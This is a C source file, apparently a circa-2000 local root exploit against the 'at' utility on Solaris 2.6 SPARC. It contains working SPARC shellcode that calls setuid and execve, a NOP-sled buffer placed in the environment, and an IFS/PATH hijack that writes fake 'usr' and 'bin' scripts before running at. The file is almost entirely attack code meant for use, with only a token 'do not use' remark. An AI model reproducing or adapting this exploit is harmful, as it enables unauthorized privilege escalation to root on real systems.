/* * at sploit - tested on 2.6 * by horizon - do not use * "I like to walk around and.. I'm paid to stand around.." */ #include #include #include #include #define RUNWAY 200000 #define SPARC_NOP 0xac15a16e #define ADDR 0xefffd008 u_char sparc_shellcode[] = "\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08" "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\xae\x10\x2b\xdc\xaf\x2d\xe0\x01\xae\x05\xe0\x01" "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01" "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01" "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x01" "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x0a" "\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; int main(int argc, char *argv[]) { char buf[RUNWAY]; char *holder; char *evec[4]; FILE * f; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); f=fopen("usr","w"); fprintf(f,"#!/bin/sh\n"); fprintf(f,"echo \'"); for (i=0;i<250;i++) fprintf(f,"%c%c%c%c", (ADDR>>24)&255, (ADDR>>16)&255, (ADDR>>8)&255, (ADDR)&255); fprintf(f,"\'\n"); fclose(f); system("cp usr bin"); system("chmod 755 usr bin"); long_p =(u_long *) buf ; for (i = 0; i < (RUNWAY - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; *char_p++ = 0; holder=malloc(10); sprintf(holder,"IFS=/"); evec[0]=holder; holder=malloc(10); sprintf(holder,"PATH=."); evec[1]=holder; holder=malloc(RUNWAY+20); sprintf(holder,"BLAH=%s",buf); evec[2]=holder; evec[3]=NULL; printf("Hit Ctrl-D\n"); printf("You won't see the output of your commands so aim well.\n"); execle("/usr/bin/at","at","-k","now",NULL,evec); } /* www.hack.co.za [2000]*/